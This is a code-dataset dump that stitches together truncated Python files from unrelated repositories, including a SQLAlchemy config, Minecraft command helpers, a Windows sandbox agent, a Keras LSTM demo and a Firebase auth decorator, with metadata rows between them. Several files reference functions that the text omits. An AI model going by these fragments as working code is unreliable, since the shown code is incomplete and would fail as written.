        process_loop()
    except KeyboardInterrupt:
        # Ctrl+C is the normal way to stop this test application.
        print("\nExiting application")
        # turn off all of the relays
        relay.all_off()
        # exit the application
        sys.exit(0)
| 26.703125 | 119 | 0.504389 |
469452474a032213255cf5547c78a4dee27d7d79 | 2,087 | py | Python | quasar/sa_database.py | stevencyrway/quasar | db8ff733ec1becf95defc7097890232cd5944d48 | [
"MIT"
] | 12 | 2017-05-17T17:22:47.000Z | 2021-05-24T17:24:42.000Z | quasar/sa_database.py | stevencyrway/quasar | db8ff733ec1becf95defc7097890232cd5944d48 | [
"MIT"
] | 484 | 2015-12-02T19:24:34.000Z | 2022-02-22T16:36:47.000Z | quasar/sa_database.py | stevencyrway/quasar | db8ff733ec1becf95defc7097890232cd5944d48 | [
"MIT"
] | 8 | 2017-04-27T20:42:05.000Z | 2022-01-11T19:43:57.000Z | import os
from sqlalchemy import bindparam, create_engine, exc
from sqlalchemy.dialects.postgresql.json import JSONB
from sqlalchemy.engine.url import URL
from sqlalchemy.sql import text
from .utils import log, logerr
# Postgres connection settings, pulled from the environment at import time.
# Each SQLAlchemy URL option maps to one PG_* environment variable; unset
# variables come through as None.
_PG_ENV = {
    'drivername': 'PG_DRIVER',
    'username': 'PG_USER',
    'password': 'PG_PASSWORD',
    'host': 'PG_HOST',
    'port': 'PG_PORT',
    'database': 'PG_DATABASE',
}
pg_opts = {option: os.getenv(variable) for option, variable in _PG_ENV.items()}
# SSL mode is handled separately from the URL options.
pg_ssl = os.getenv('PG_SSL')
| 32.107692 | 75 | 0.632966 |
4694573c6edf0ff0ed4f4786ad3fb6ae431575db | 29,122 | py | Python | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | 1 | 2020-06-13T13:57:11.000Z | 2020-06-13T13:57:11.000Z | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | null | null | null | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | null | null | null | import abc
def make_selector(selector, **kwargs):
    """Build a target selector string such as "@a" or "@e[tag=foo]".

    *selector* is the selector name appended after "@"; any keyword
    arguments become the bracketed argument list, rendered by the
    module-level str_pairs helper.
    """
    base = '@' + selector
    if kwargs:
        return '%s[%s]' % (base, str_pairs(kwargs.items()))
    return base
GlobalEntity = _GlobalEntity()
PosUtil = _PosUtil()
def StackFrame(index):
    # NOTE(review): *index* is unused and StackFramePath is not defined in
    # this excerpt — the body appears truncated by the extraction (upstream
    # presumably returns a frame path built from *index*). TODO confirm
    # against the original source.
    return StackFramePath
StackFrameHead = StackFrame(0)
def ensure_selector(sel_arg):
    """Validate that *sel_arg* is an EntityRef and return it unchanged.

    Raises:
        AssertionError: if *sel_arg* is not an EntityRef. Raised
            explicitly (rather than via the ``assert`` statement) so the
            check stays active under ``python -O``, which strips asserts.
    """
    if not isinstance(sel_arg, EntityRef):
        raise AssertionError(sel_arg)
    return sel_arg
UtilBlockPos = _UtilBlockPos(False)
ZeroTickBlockPos = _UtilBlockPos(True)
| 29.327291 | 86 | 0.588215 |
46950a30a497c84732798b48f44483d04a01233a | 217 | py | Python | top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | [
"Apache-2.0"
] | 1 | 2020-01-16T09:23:43.000Z | 2020-01-16T09:23:43.000Z | top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | [
"Apache-2.0"
] | null | null | null | top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | [
"Apache-2.0"
] | null | null | null | import requests
keyword = "python"
try:
kv = {'q':keyword}
r = requests.get('http://www.so.com/s', params=kv)
print(r.request.url)
r.raise_for_status()
print(len(r.text))
except:
print('') | 19.727273 | 54 | 0.617512 |
4695279b1ca8306d24c6c58add7de32e6798011f | 4,489 | py | Python | rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | import torch.nn as nn
| 32.294964 | 101 | 0.461573 |
46955a61d6eda18fd04e0a7384414c8a588922bf | 85 | py | Python | File/admin.py | alstn2468/Likelion_DRF_Project | 35a359a05185f551ed2e999ab17e0108a69d6b57 | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | 15_LikeLionDRFProject/File/admin.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 1 | 2021-05-22T18:27:01.000Z | 2021-05-22T18:27:01.000Z | 15_LikeLionDRFProject/File/admin.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | from django.contrib import admin
from .models import File
# Register the File model with the Django admin using the default ModelAdmin.
admin.site.register(File)
| 17 | 32 | 0.811765 |
469862e42b088f23b41b49c8734db4c50395bddc | 28,022 | py | Python | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 21 | 2019-10-24T04:59:52.000Z | 2021-05-11T12:47:17.000Z | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | null | null | null | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 9 | 2019-10-26T16:56:08.000Z | 2021-03-15T14:10:21.000Z | import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
# Module configuration. Reading sys.argv at import time means this script
# must be launched as:
#   agent.py <template_server_ip> <template_server_port> <controller_web_port>
# (Python 2 — note the print statements below.)
DEBUG = True
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])
# Pick user-writable staging paths per Windows version; platform.release()
# returns "7" on Windows 7 and "XP" on Windows XP.
running_os = platform.release()
if running_os == "7":
    APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
        current_user=getpass.getuser())
    TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
        current_user=getpass.getuser())
elif running_os == "XP":
    # To avoid tool issues when dealing with white-spaced paths.
    # (8.3 short names: DOCUME~1 stands for "Documents and Settings", etc.)
    APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
        current_user=getpass.getuser())
    TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
        current_user=getpass.getuser())
else:
    print "Unsupported platform! Exiting..."
    sys.exit()
if __name__ == "__main__":
    # The Agent class is defined earlier in this file (not visible in this
    # excerpt). Keep the agent alive: restart it whenever the connection
    # drops, until the user hits Ctrl+C.
    agent = Agent()
    try:
        agent.start()
        while True:
            # agent.check_connection()
            # NOTE(review): this loop spins between connection checks with
            # no sleep — presumably is_connected()/start() block. Confirm.
            if not agent.is_connected():
                # If agent stops. Start it again.
                agent.start()
    except KeyboardInterrupt:
        print "Manual interruption. Bye!"
        sys.exit()
| 40.552822 | 126 | 0.554386 |
469870ae47593eb387aa34d03ce486676acb3094 | 2,599 | py | Python | python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | # LSTM with Variable Length Input Sequences to One Character Output
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.utils import np_utils
from keras.preprocessing.sequence import pad_sequences
from theano.tensor.shared_randomstreams import RandomStreams
# fix random seed for reproducibility
numpy.random.seed(7)
# define the raw dataset
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# create mapping of characters to integers (0-25) and the reverse
char_to_int = dict((c, i) for i, c in enumerate(alphabet))
int_to_char = dict((i, c) for i, c in enumerate(alphabet))
# prepare the dataset of input to output pairs encoded as integers: each
# sample is a random alphabet substring (1..max_len chars) and the target
# is the single character that follows it.
num_inputs = 16
max_len = 5
dataX = []
dataY = []
for i in range(num_inputs):
    start = numpy.random.randint(len(alphabet)-2)
    end = numpy.random.randint(start, min(start+max_len,len(alphabet)-1))
    sequence_in = alphabet[start:end+1]
    sequence_out = alphabet[end + 1]
    dataX.append([char_to_int[char] for char in sequence_in])
    dataY.append(char_to_int[sequence_out])
    print( sequence_in, '->', sequence_out )
# convert list of lists to array and pad sequences if needed
# (shorter sequences are left-padded with zeros up to max_len)
X = pad_sequences(dataX, maxlen=max_len, dtype='float32')
# reshape X to be [samples, time steps, features]
X = numpy.reshape(X, (X.shape[0], max_len, 1))
# normalize character codes into [0, 1)
X = X / float(len(alphabet))
# one hot encode the output variable
y = np_utils.to_categorical(dataY)
# create and fit the model: a stateful LSTM requires a fixed batch size,
# declared via batch_input_shape.
batch_size = 1
model = Sequential()
model.add(LSTM(16, batch_input_shape=(batch_size, X.shape[1], X.shape[2]), stateful=True))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# NOTE(review): ``nb_epoch`` is the Keras 1.x spelling (renamed ``epochs``
# in Keras 2). LSTM state is reset manually after each epoch because the
# training samples are independent of each other.
for i in range(1):
    model.fit(X, y, nb_epoch=1, batch_size=batch_size, verbose=2, shuffle=False)
    model.reset_states()
# summarize performance of the model on the training data itself
scores = model.evaluate(X, y, batch_size=batch_size, verbose=0)
model.reset_states()
print("Model Accuracy: %.2f%%" % (scores[1]*100))
# demonstrate some model predictions on randomly chosen training samples
for i in range(1):
    pattern_index = numpy.random.randint(len(dataX))
    pattern = dataX[pattern_index]
    x = pad_sequences([pattern], maxlen=max_len, dtype='float32')
    x = numpy.reshape(x, (1, max_len, 1))
    x = x / float(len(alphabet))
    prediction = model.predict(x, verbose=0)
    index = numpy.argmax(prediction)
    result = int_to_char[index]
    seq_in = [int_to_char[value] for value in pattern]
    print( seq_in, "->", result )
| 41.919355 | 91 | 0.719123 |
4699a0bfa6dd1ddc3a1e8897780df54022543382 | 8,541 | py | Python | DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 8931cec0387e5c8b599df40d652ac5fdb5c49a8f | [
"MIT"
] | null | null | null | DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 8931cec0387e5c8b599df40d652ac5fdb5c49a8f | [
"MIT"
] | null | null | null | DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 8931cec0387e5c8b599df40d652ac5fdb5c49a8f | [
"MIT"
] | null | null | null | """
Direction prediction based on learning dataset from reactome
PPI direction calculated from domain interaction directions
"""
# Imports
import sqlite3, csv, os
import pandas as pd
import logging
import pickle
# # Initiating logger
# logger = logging.getLogger()
# handler = logging.FileHandler('../../workflow/SLK3.log')
# logger.setLevel(logging.DEBUG)
# handler.setLevel(logging.DEBUG)
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# handler.setFormatter(formatter)
# logger.addHandler(handler)
if __name__ == '__main__':
    # DirScore is defined earlier in this file (not visible in this
    # excerpt). Build the learning/test set, then write the predicted
    # PPI direction scores back to the database.
    # NOTE(review): the logger setup directly above is commented out, so
    # ``logger`` must be created elsewhere in the file or these calls
    # raise NameError — TODO confirm.
    test = DirScore()
    logger.debug('Creating test set')
    test.test_scores()
    logger.debug('Adding scores to dataset')
    test.apply_to_db()
    logger.debug('Direction prediction done')
| 45.673797 | 125 | 0.550872 |
4699a1827567dd51a8a50f85f10e57138d48a545 | 1,398 | py | Python | src/main.py | vcodrins/json_to_folder | 3e07259b1c5757587a5235b2412441d87607597f | [
"MIT"
] | null | null | null | src/main.py | vcodrins/json_to_folder | 3e07259b1c5757587a5235b2412441d87607597f | [
"MIT"
] | null | null | null | src/main.py | vcodrins/json_to_folder | 3e07259b1c5757587a5235b2412441d87607597f | [
"MIT"
] | null | null | null | import json
import os.path
import sys
from exceptions import *
from create_folder_structure import create_folder_structure
main()
| 26.884615 | 96 | 0.556509 |
469a1ea0ba86db2759c0a614f1ca8112b547ba08 | 277 | py | Python | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | 7 | 2020-06-19T15:32:07.000Z | 2021-08-23T20:49:39.000Z | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | from datetime import timedelta
import pytest
from model_bakery import baker
| 19.785714 | 41 | 0.693141 |
469ba49461fc882de80bb1d478b0aec8c3c11361 | 3,952 | py | Python | src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | d4a2b196f21a5379188cb78b31c59d69f739964f | [
"RSA-MD"
] | 7 | 2020-05-18T14:20:17.000Z | 2020-07-27T17:37:38.000Z | src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | d4a2b196f21a5379188cb78b31c59d69f739964f | [
"RSA-MD"
] | null | null | null | src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | d4a2b196f21a5379188cb78b31c59d69f739964f | [
"RSA-MD"
] | 2 | 2020-05-18T14:20:22.000Z | 2020-07-27T17:37:05.000Z | from flask import request
from google.auth.transport import requests
import google.oauth2.id_token
from server.ApplikationsAdministration import ApplikationsAdministration
#Benutzer.py, BenutzerMapper + BenutzerMethoden in ApplikationsAdministration
def secured(function):
    """Decorator for Google Firebase-based user authentication.

    Since this system is a basic case study for teaching purposes, a
    sophisticated authorization concept was deliberately omitted. Rather,
    this decorator demonstrates one way to bootstrap authentication with
    reasonable technical effort.

    POLICY: anyone holding an account accepted by Firebase may log in to
    this system. On every login, the display name, e-mail address and the
    Google user ID are stored or updated in our system, so a later
    extension of the system could draw on that data.
    """
    # google.auth transport adapter used when verifying Firebase ID tokens
    # (``requests`` here is google.auth.transport.requests, not the HTTP
    # library).
    firebase_request_adapter = requests.Request()
    # NOTE(review): the inner ``wrapper`` function is not defined in this
    # excerpt — its definition appears to have been truncated. As shown,
    # ``return wrapper`` would raise NameError. TODO confirm against the
    # original source.
    return wrapper
| 45.953488 | 97 | 0.603492 |